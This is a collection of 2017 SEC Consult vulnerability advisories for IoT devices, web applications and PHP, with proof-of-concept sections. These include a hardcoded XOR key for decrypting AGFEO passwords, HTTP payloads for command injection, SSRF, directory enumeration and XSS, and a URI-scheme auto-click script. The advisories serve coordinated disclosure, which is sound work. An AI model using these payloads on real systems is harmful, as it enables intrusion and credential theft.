2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-07-24. 2017-07-24: Public release of security advisory Solution: - Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later. Workaround: --- No workaround Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of
SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products
SEC Consult Vulnerability Lab Security Advisory < 20170712-0 > === title: Multiple critical vulnerabilities product: AGFEO Smart Home ES 5xx AGFEO Smart Home ES 6xx vulnerable version: at least 1.9b, 1.10 fixed version: 1.12c CVE number: - impact: Critical homepage: https://www.agfeo.de/ found: 2016-12-28 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- AGFEO GmbH & Co. KG is a vendor of telephone systems and other (tele-)communication products like DECT phones, headsets or smart home products as well. Business recommendation: The available patches should be installed immediately. SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals as there are indications for further security issues. Vulnerability overview/description: --- 1) Unauthenticated access to web services and authentication bypass A web service with multiple scripts for debug purposes is accessible on an unusual port on the device. There is also a script to read files from the filesystem. As the web service runs with root privileges all files on the operating system can be read by an attacker. This only affects the ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx. The configuration of the device can be changed and arbitrary updates can be uploaded as well as music files for the answering machine. By reading the database content, the usernames and their passwords can be revealed and easily decrypted. This way the administrator password can be dumped from the database and the device can be fully administrated by an attacker. The normal user interface has an additional development subfolder which was probably used during the development process. Updates can be triggered from this sub platform and log files, statistics and states can also be displayed. 2) Unauthenticated access to configuration ports Multiple different instances of TCP services are present on the device. Each of the listening sockets is forked from a debug and configuration service. Internal device information can be read from the device. Among other commands, the configuration of the device can also be altered by using these services. 3) Hardcoded cryptographic keys Three certificates including their private keys are embedded in the firmware of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both product lines are exactly the same. One certificate is used for HTTPS (default server certificate for web based configuration and management). Impersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks. 4) Multiple reflected cross site scripting (XSS) vulnerabilities The ES 5xx SmartHome products are vulnerable to reflected cross site scripting. Malicious JavaScript code can be executed in the browser of a victim by luring to a handcrafted link. This is possible even if the victim is not logged in. It is assumed that the 6xx products are affected as well but those could not be tested. Proof of concept: - 1) Unauthenticated access to web services and authentication bypass The debug web service is available by using the following url: http://:20011/index.html There are different scripts accessible, the following actions can be executed: -) Change IP configuration -) Change time zone -) Upload updates (Any files can be uploaded to the device!) -) Read all files on the filesystem -) Play, delete and move voice messages on all mail boxes -) Converting mp3 files to wav files -) List all connected phones and the related numbers The SQLite database is located under "/home/profile/poolstore.db". By reading this file the usernames and passwords can be dumped. The passwords are encoded with base64 and encrypted with XOR. To decrypt the XOR'ed password the following key has to be used: "0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba" The function to decrypt the password was found in the php script "login.php": function decodePassword($PasswordEnc) { $PasswordBinaryEncBase64 = ""; $PasswordBinaryEnc=""; $PasswordBinary = array(); $Password = "
SEC Consult SA-20170630-0 :: Multiple critical vulnerabilities in OSCI-Transport library 1.2 for German e-Government
We have published an accompanying blog post to this technical advisory with further information: German version with less technical details as an overview: http://blog.sec-consult.com/2017/06/e-government-in-deutschland-schwachstellen.html English version containing more detailed attack scenario descriptions: http://blog.sec-consult.com/2017/06/german-e-government-details-vulnerabilities.html SEC Consult Vulnerability Lab Security Advisory < 20170630-0 > === title: Multiple critical vulnerabilities product: OSCI-Transport library 1.2 for German e-Government vulnerable version: 1.6.1 fixed version: 1.7.1 CVE number: CVE-2017-10668 (Padding Oracle) CVE-2017-10669 (Signature Wrapping) CVE-2017-10670 (XXE) impact: Critical homepage: http://www.xoev.de found: 01/2017 by: Wolfgang Ettlinger (Office Vienna) Marc Nimmerrichter (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Mit der Spezifikation des Protokolls OSCI-Transport in der Version 1.2 wird ein sicheres, herstellerunabhängiges und interoperables Datenaustauschformat beschrieben. Um die Implementierung für Anwender in der öffentlichen Verwaltung sowie der Fachverfahrenshersteller zu erleichtern, wird die OSCI 1.2 Bibliothek angeboten: Die Bibliothek implementiert OSCI-Transport in der Version 1.2 und ist damit unabhängig von Fachinhalten. Sie ist Bestandteil der OSCI-Transport Infrastruktur. Die OSCI-Transport-Bibliothek soll in Fachverfahren (auf Verwaltungsseite) oder Clientsystemen (auf Kundenseite) implementiert werden." URL: http://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310 Business recommendation: During a short security test, SEC Consult found several severe security vulnerabilities in the OSCI 1.2 Transport library. The OSCI 1.2 Transport library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies for eGovernment. However, SEC Consult found that multiple vulnerabilities allow attackers to decrypt encrypted messages as well as modify signed messages. Moreover, a vulnerability can be used to read arbitrary files from any host that implements the OSCI 1.2 transport protocol using this library. SEC Consult recommends KoSIT and its partners to _immediately_ stop using the OSCI 1.2 Transport library over untrusted networks. Moreover, a forensic investigation should be conducted on all affected systems to investigate whether the vulnerabilities have been exploited in the past. The library should only be used again after a thorough source code security review has been conducted and all vulnerabilities have been fixed. It is quite likely that further vulnerabilities exist as there are indications for potential XML injection flaws. Vulnerability overview/description: --- 1) External Entity Injection (XXE) [CVE-2017-10670] By sending manipulated XML data to any communication partner, an attacker is able to conduct an XXE attack on the receiving system. This attack allows an attacker to read arbitrary files from the file system of the victim host or to conduct a denial of service attack. 2) Padding Oracle Attack [CVE-2017-10668] The OCSI 1.2 Transport library only supports the following encryption algorithms: * http://www.w3.org/2001/04/xmlenc#tripledes-cbc * http://www.w3.org/2001/04/xmlenc#aes128-cbc * http://www.w3.org/2001/04/xmlenc#aes192-cbc * http://www.w3.org/2001/04/xmlenc#aes256-cbc All of these algorithms are no longer recommended by the W3C: "Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...] have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/) Since the supported cipher algorithms do not provide protection against modification (malleability) and the library reveals in an error message whether decryption failed (error code 9202), SEC Consult was able to conduct a padding oracle attack. This attack allows an attacker to bypass transport encryption. 3) Signature Wrapping attack [CVE-2017-10669] By moving XML elements within the document tree, a signature wrapping attack can be conducted. This allows an attacker to modify the co
SEC Consult SA-20170613-0 :: Access Restriction Bypass in Atlassian Confluence
SEC Consult Vulnerability Lab Security Advisory < 20170613-0 > === title: Access Restriction Bypass product: Atlassian Confluence vulnerable version: 4.3.0 - 6.1.1 fixed version: 6.2.1 CVE number: - impact: Medium homepage: https://www.atlassian.com/ found: 2017-03-27 by: Mathias Frank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "In 2002, our founders, Scott Farquhar and Mike Cannon-Brookes, set conventional wisdom on its ear by launching a successful enterprise software company with no sales force. From Australia. Our first product, JIRA, proved that if you make a great piece of software, price it right, and make it available to anyone to download from the internet, teams will come. And they'll build great things with it. And they'll tell two friends, and so on, and so on. Today a lot has changed. We're over 1,700 Atlassians (and growing), in six locations, with products to help all types of teams realize their visions and get stuff done. But the fundamentals remain the same. We're for teams because we believe that great teams can do amazing things. We're not afraid to do things differently. And we're driven by an inspiring set of values that shape our culture and our products for the better." Source: https://www.atlassian.com/company Business recommendation: SEC Consult recommends to upgrade to the latest version available which fixes the identified issue. Vulnerability overview/description: --- 1) Access Restriction Bypass The "watch" functionality provides a user the option to subscribe to specific content. Furthermore, the user gets a notification for any new comment made to the previously subscribed content. A user can manually subscribe to pages which he is not able to view and he then receives any further comment made on the restricted page. Proof of concept: - 1) Access Restriction Bypass Prerequisite as admin user just for a proof of concept demo page: * Create a Space "Demo Space" visible for every user and group * Create a Page "Demo Page" (example pageID: 1048582) and restrict the "Viewing and editing restriction" to only the administrator group/user with the "/pages/getcontentpermissions.action" function. Send the following request as user: -- POST /users/addpagenotificationajax.action HTTP/1.1 Host: localhost:8090 Referer: http://localhost:8090/display/ds/Welcome+to+Confluence Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest [...] pageId=1048582_token=1b5ee6615c44e4067679ccfa6e5904f0e42e8eb7 -- Then the user is subscribed to the "Demo Page" and receives a notification and is able to receive any further comments made on the subscribed page. Vulnerable / tested versions: - The following version has been tested by SEC Consult Atlassian Confluence version 5.9.14 and 6.1.1 Atlassian believes that versions beginning from 4.3.0 before 6.2.1 are affected. Vendor contact timeline: 2017-04-03: Contacting vendor through secur...@atlassian.com 2017-04-05: Vendor confirmed the vulnerability and issued the references CONFSERVER-52241 (Confluence Server) and CONFCLOUD-54634 (Confluence Cloud) 2017-04-13: Vendor fixed the issue CONFCLOUD-54634. 2017-05-11: Asked for planned timeline and release of an fix for CONFSERVER-52241. 2017-05-29: Vendor released a fix for CONFSERVER-52241 with version 6.2.1. 2017-06-08: Vendor prepares a sanitised copy of CONFSERVER-52241 for release along with the advisory - https://jira.atlassian.com/browse/CONFSERVER-52560 2017-06-13: Public release of advisory. Solution: - Upgrade to version 6.2.1 available at: https://www.atlassian.com/software/confluence/download The effectiveness of the fix was verified by the SEC Consult Vulnerability Lab. https://jira.atlassian.com/browse/CONFSERVER-52560 Workaround: --- Disable workbox notifications as per the instructions found at https://confluence.atlassian.com/doc/configuring-workbox-notifications-301663830.html Advisory URL: -
SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App
A short demo video is available here: https://youtu.be/0jZdM9peVSk SEC Consult Vulnerability Lab Security Advisory < 20170510-0 > === title: Insecure Handling Of URI Schemes product: Microsoft OneDrive iOS App vulnerable version: 8.13 fixed version: 8.14 impact: Medium homepage: https://onedrive.live.com/ found: 2017-04-10 by: S. Tripathy (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Do more wherever you go with Microsoft OneDrive. Get to and share your documents, photos, and other files from your iOS device, computer (PC or Mac), and any other devices you use. Use the Office mobile apps to stay productive and work together, no matter where you are. The OneDrive app for iOS lets you easily work with your personal and work files when you're on the go." Source: https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8 Business recommendation: SEC Consult recommends to implement a proper validation to handle the URI schemes. Always ask for user permission before calling an external URI scheme. Vulnerability overview/description: --- 1) Insecure Handling of URI Schemes Due to the lack of URI schemes validation any external URI scheme can be invoked by the Microsoft OneDrive iOS application with out any user interaction. Proof of concept: - 1) Insecure Handling of URI Schemes An attacker can upload and share a malicious HTML file to invoke an external URI scheme. Once the file is accessed by any OneDrive user with an iOS device, the external URI scheme will be invoked automatically. Example of a malicious HTML file: click var t = document.getElementById("callme"); var fe = document.createEvent("MouseEvents"); fe.initEvent("click", true, true); t.dispatchEvent(fe); = Vulnerable / tested versions: - The following version is affected by the identified vulnerability which was the most recent version at the time of discovery: Microsoft OneDrive iOS application v8.13 Vendor contact timeline: 2017-04-11: Contacting vendor through sec...@microsoft.com 2017-04-12: Vendor confirmed the vulnerability. 2017-04-21: Vendor released the updated version. 2017-05-10: Public release of advisory. Solution: - SEC Consult recommends to implement a proper validation to handle the URI schemes. Always ask for user permission before calling a URI scheme. Update to OneDrive v8.14 https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8 Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Siddhartha Tripathy / @2017 smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20170509-0 :: Multiple vulnerabilities in I, Librarian PDF manager
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 > === title: Multiple vulnerabilities product: I, Librarian PDF manager vulnerable version: <=4.6 & 4.7 fixed version: 4.8 CVE number: - impact: Critical homepage: https://i-librarian.net/ found: 2017-01-30 by: Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "I, Librarian is a PDF manager or PDF organizer, which enables researchers, scholars, or students to create an annotated collection of PDF articles. If used as a groupware, users may build their virtual library collaboratively, sharing the workload of literature mining. I, Librarian will make your work with scientific literature incredibly efficient." Source: https://i-librarian.net/ Business recommendation: By combining the vulnerabilities documented in this advisory an attacker can fully compromise the web server which has the "I, Librarian" software installed. SEC Consult recommends to install the latest version available immediately and perform a thorough security review of this software. Vulnerability overview/description: --- The application doesn't apply proper validation on some user inputs. As a result, below vulnerabilities can be exploited by authenticated attackers with any roles to fully compromise the system. 1. OS Command Injection Arbitrary OS commands are possible to be executed from "batchimport.php". This is a serious vulnerability as the chances for the web server to be fully compromised are very high. 2. Server-Side Request Forgery This vulnerability allows an attacker to send HTTP requests originating from the web server. As some functions in the web application require requests to be done from localhost, the risk for this vulnerability is considered high. 3. Directory Enumeration It is possible to enumerate all directories in any directory on the server through "jqueryFileTree.php". 4. Reflected Cross Site Scripting This vulnerability was found in "temp.php". It allows an attacker to inject malicious client side scripting which will be executed in the browser of users if they visit the manipulated site. Proof of concept: - 1. OS Command Injection Below is the detail of a HTTP request that needs to be sent to execute arbitrary OS commands through "batchimport.php": URL : http://$DOMAIN/batchimport.php METHOD : GET PAYLOAD : directory=.=="" 2. Server-Side Request Forgery Below shows an example of the exploitation for this vulnerability. An attacker can reset any user's password which by design requires the request to be sent from localhost. URL : http://$DOMAIN/ajaxsupplement.php METHOD : POST PAYLOAD : form_new_file_link=http://$DOMAIN/resetpassword.php?username=_password1=_password2= 3. Directory Enumeration Available directories can be enumerated simply by navigating through the "dir" parameter in "jqueryFileTree.php". URL : http://$DOMAIN/jqueryFileTree.php METHOD : POST PAYLOAD : dir= 4. Reflected Cross Site Scripting The following payload shows a simple alert message box: URL : http://$DOMAIN/temp.php METHOD : GET PAYLOAD : tempfile=alert(42) Vulnerable / tested versions: - "I, Librarian" version 4.6 has been tested. This version was the latest at the time the security vulnerabilities were discovered. It is assumed that previous versions are affected as well. Vendor contact timeline: 2017-01-31: Contacting vendor through supp...@i-librarian.net 2017-01-31: Vendor replied with their PGP public key. 2017-02-03: Provided encrypted advisory and proof of concept to the vendor. 2017-02-09: Patch released, version 4.7. 2017-02-21: Informed vendor on some issues which were not addressed correctly. 2017-03-30: Patch released by the vendor - I, Librarian version 4.8. 2017-05-09: Public release of advisory Solution: - Upgrade to I, Librarian 4.8 For further information see: https://i-librarian.net/article.php?id=9 Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~
SEC Consult SA-20170407-0 :: Server-Side Request Forgery in MyBB forum
SEC Consult Vulnerability Lab Security Advisory < 20170407-0 > === title: Server Side Request Forgery (SSRF) Vulnerability product: MyBB vulnerable version: 1.8.10 fixed version: 1.8.11 CVE number: CVE-2017-7566 impact: Medium homepage: https://mybb.com/ found: 2017-03-03 by: Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "With everything from forums to threads, posts to private messages, search to profiles, and reputation to warnings, MyBB features everything you need to run an efficient and captivating community. Through plugins and themes, you can extend MyBB's functionality to build your community exactly as you'd like it." Source: https://mybb.com/ Business recommendation: The patch should be installed immediately if cURL functions are disabled. Furthermore, SEC Consult recommends to perform a thorough security review of this software. Vulnerability overview/description: --- 1. Server-Side Request Forgery An attacker is able to initiate socket connections with arbitrary systems using the internal network interface of the server via the web application's "Change Avatar" function. This vulnerability can be used to identify internal hosts and perform internal port scanning. Proof of concept: - 1. Server-Side Request Forgery This vulnerability can be exploited by an attacker with a registered account as low as a normal account. If the server which is hosting the web application disallows cURL functions, the application will use the "fsockopen" function as an alternative. Below is the example on how the SSRF issue can be exploited. URL : http://$DOMAIN/usercp.php METHOD : POST PAYLOAD : avatarurl=http://$IP:$PORT:80 Vulnerable / tested versions: - MyBB version 1.8.10 has been tested. This version was the latest version at the time the security vulnerability was discovered. Vendor contact timeline: 2017-03-09: Contacting vendor through the "Private Inquiries" forum at https://community.mybb.com/forum-135.html 2017-03-09: Advisory sent through the "Private Inquiries". Vendor has confirmed the issues. No specific date on the fix was given 2017-03-17: Vendor confirmed the vulnerability; working on the fix 2017-03-31: Requesting a status update. 2017-04-04: Patch released by the vendor. 2017-04-07: Public release of advisory. Solution: - Upgrade to MyBB 1.8.11 For further information see: https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Fikri Fadzil / @2017 smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20170403-0 :: Misbehavior of PHP fsockopen function
SEC Consult Vulnerability Lab Security Advisory < 20170403-0 > === title: Misbehavior of the "fsockopen" function product: PHP vulnerable version: 7.1.2 fixed version: CVE number: CVE-2017-7272 impact: Medium homepage: http://www.php.net/ found: 2017-03-06 by: Fikri Fadzil (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "PHP is a popular general-purpose scripting language that is especially suited to web development. Fast, flexible and pragmatic, PHP powers everything from your blog to the most popular websites in the world." Source: http://www.php.net/ Business recommendation: By making use of this issue, it is possible for an attacker to bypass current prevention mechanisms used to protect the "fsockopen" function in PHP to perform server-side request forgery attacks. SEC Consult recommends to check the developed or installed websites for any possibility to exploit any form of vulnerability due to this issue. Vulnerability overview/description: --- The "fsockopen" function in PHP will respond differently if two port numbers are given at once. As many developers assume the function will prioritize the port number given to the second function parameter, an attacker may utilize this unpredictable behavior to e.g. conduct a server-side request forgery attack. Proof of concept: - The "fsockopen" function in PHP will not use the port number given to the second parameter if the hostname already has a port number appended. The example below should explain misbehavior of the function. // This request will go to port 80 fsockopen("192.168.184.132", 80); // This request will go to port 53 fsockopen("192.168.184.132:53", 80); Instead of initiating a socket connection on port 80 as given in the second parameter, the function appears to use the port number 53 which is appended to the hostname. Vulnerable / tested versions: - PHP version 7.0.11 and 7.1.2 have been tested and found to be vulnerable. Older PHP versions are potentially affected as well. Vendor contact timeline: 2017-03-07: Reported the issue through PHP Bug Tracking System. (SecBug #74216) https://bugs.php.net/bug.php?id=74216 2017-03-07: Changes were committed to the PHP's main repo in Github. https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a 2017-04-03: Public disclosure of the advisory Solution: - Patch: https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a Workaround: --- It is recommended to restrict user input data for a hostname to not have a port number appended. Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Fikri Fadzil / @2017 signature.asc Description: OpenPGP digital signature
SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 > === title: Multiple vulnerabilities product: Solare Datensysteme GmbH Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85 fixed version: Firmware 3.5.3-86 CVE number: - impact: Critical homepage: http://www.solar-log.com/de/home.html found: 2017-01-23 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Solare Datensysteme GmbH (SDS) is headquartered in the southern German city of Binsdorf and specialises in the development and sale of monitoring systems for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and Jörg Karwath and was created from the company "TOP Solare Datensysteme". This company had been developing and selling the "SolarLog™" product range since 2005. Our core competence covers innovative products with short development cycles and an excellent cost/performance ratio. Our developments have the outstanding characteristics of high customer value, simple operation and universal application without requiring time-consuming installation of software." Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html Business recommendation: SEC Consult recommends to immediately install the available firmware update and restrict network access. Furthermore, this device should not be used in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Unauthenticated Download of Configuration including Device-Password This vulnerability is present at least on firmware 2.8.4-56. An attacker can download the configuration file without authentication and extract the password to login to Solar-Log. Therefore, an attacker can gain administrative access to such a device without prior authentication. 2) Cross-Site Request Forgery (CSRF) This vulnerability is present at least on firmware 3.5.2-85. A CSRF vulnerability enables an attacker to remove/modify a password of a device by luring an authenticated user to click on a crafted link. An attacker is able to take over the device by exploiting this vulnerability. 3) Unauthenticated Arbitrary File Upload This vulnerability is present at least on firmware 3.5.2-85. Any files can be uploaded on the Solar-Log by using a crafted POST request. An attacker can start a malicious website or use the Solar-Log as share to store any (illegal) contents. 4) Information Disclosure (CVE-2001-1341) All Solar-Log devices in the current firmware versions are prone to this information disclosure vulnerability. (2.8.4-56 / 3.5.2-85) The network configuration of the internal network including the gateway and the MAC address of the device are leaked. All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS version and serial number are leaked as well. 5) Unauthenticated Change of Network-Configuration All Solar-Log devices in the current firmware versions are prone to this vulnerability. (2.8.4-56 / 3.5.2-85) Since the Solar-Log is based on the chips of Beck IPC a UDP configuration server is enabled by default. This server allows to change the IP configuration over a specific UDP port. This functionality can be protected with a password, but this is not set in the affected firmware versions. The MAC address, which is leaked by 4), is needed to configure the device. An attacker can reconfigure the device without any authentication. 6) Unauthenticated Denial of Service All Solar-Log devices in the current firmware versions are prone to this vulnerability. (2.8.4-56 / 3.5.2-85) The Beck IPC UDP configuration server on Solar-Log device can be attacked with arbitrary UDP packets to permanently disable the Solar-Log until a manual reboot is triggered. 7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory Potentially available in all Solar-Log devices in the current firmware versions. (2.8.4-56 / 3.5.2-85) Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip over the network via UDP, a missing password can also enable an attacker to do this on a Solar-Log device. This action can lead to a simple Denial of Service or a complex botnet of Solar-Log devices! Proof of concept:
SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170316-0 > === title: Authenticated Command Injection product: Multiple Ubiquiti Networks products, e.g. TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16, AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M, AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti, BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5, locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22, NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365, NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP, Power AP N vulnerable version: v1.3.3 (SW), v5.6.9/v6.0 (XM) fixed version: - CVE number: - impact: Critical homepage: https://www.ubnt.com found: 2016-11-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Command Injection in Admin Interface A command injection vulnerability was found in "pingtest_action.cgi". This script is vulnerable since it is possible to inject a value of a variable. One of the reasons for this behaviour is the used PHP version (PHP/FI 2.0.1 from 1997). The vulnerability can be exploited by luring an attacked user to click on a crafted link or just surf on a malicious website. The whole attack can be performed via a single GET-request and is very simple since there is no CSRF protection. See our other advisory published in January 2017: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170130-0_Ubiquiti_Networks_XSS_CSRF_v10.txt An attacker can open a port binding or reverse shell to connect to the device and is also able to change the "passwd" since the web service runs with root privileges! Furthermore, low privileged read-only users, which can be created in the web interface, are also able to perform this attack. If the Ubiquiti device acts as router or even as firewall, the attacker can take over the whole network by exploiting this vulnerability. Proof of concept: - 1) Command Injection in Admin Interface The following link can be used to open a reverse shell to the attacker's IP address. There are two possibilities for the different firmware versions. Reverse root shell - firmware: v1.3.3 (SW) [ PoC removed - no patch available ] Reverse root shell - firmware: v5.6.9/v6.0 (XM) [ PoC removed - no patch available ] A video is available here: https://youtu.be/oU8GNeP_Aps Vulnerable / tested versions: - The following devices and firmware versions have been tested/verified: TS-8-PRO - v1.3.3 (SW) (Rocket) M5 - v5.6.9/v6.0 (XM) (PicoStationM2HP) PICOM2HP - v5.6.9/v6.0 (XM) (NanoStationM5) NSM5 - v5.6.9/v6.0 (XM) Based on information embedded in the firmware of other Ubiquiti products gathered from our IoT Inspector tool we believe the following devices are affected as well: Ubiquiti Networks AF24 (Version: AF24 v3.2) Ubiquiti Networks AF24HD (Version: AF24 v3.2) Ubiquiti Networks AF-2X (Version: AF2X v3.2 ) Ubiquiti Networks AF-3X (Version: AF3X v3.2) Ubiquiti Networks AF5 (Version: AF5 v3.2) Ubiquiti Networks AF5U (Version: AF5 v3.2) Ubiquiti Networks AF-5X (Version: AF5X v3.2.1) Ubiquiti Networks 